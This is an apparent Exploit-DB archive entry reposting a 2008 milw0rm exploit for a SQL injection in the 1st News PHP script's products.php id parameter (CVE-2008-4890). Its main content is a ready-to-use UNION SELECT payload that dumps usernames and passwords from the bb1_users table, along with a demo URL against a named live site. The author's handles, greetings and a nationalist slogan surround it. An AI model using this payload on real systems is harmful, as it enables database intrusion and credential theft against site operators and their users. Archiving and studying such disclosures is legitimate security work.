1st News - products.php id Remote SQL Injection Vulnerability

2008-11-02T00:00:00
ID EDB-ID:6960
Type exploitdb
Reporter TR-ShaRk
Modified 2008-11-02T00:00:00

Description

1st News (products.php id) Remote SQL Injection Vulnerability. CVE-2008-4890. Webapps exploit for php platform

                                        
                                            ##################################################################
#
#   Author: TR-ShaRk
#
######################
#
#   Web   : StarHack.Us OldKral.Com
#
######################
#
#   Emai   : Admin@tr-shark.org
#
######################
#
#   Script price : 19,00€
#
#   Here:http://1st-scripts.de/products.php?id=18&associate=
#
#
######################
#
#   SQL Injection Vuln. :
#   products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
#
#
######################
#
#   Demo:
#
#   http://1st-scripts.de/products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
#
######################
SEHITLER ÖLMEZ VATAN BÖLÜNMEZ
Greetz: STR0KE , WEBLOADER , REALWOLKER , KOMANDO , CEYPOWER , ARANELWORM , MYSTICAL_DEWIL

# milw0rm.com [2008-11-02]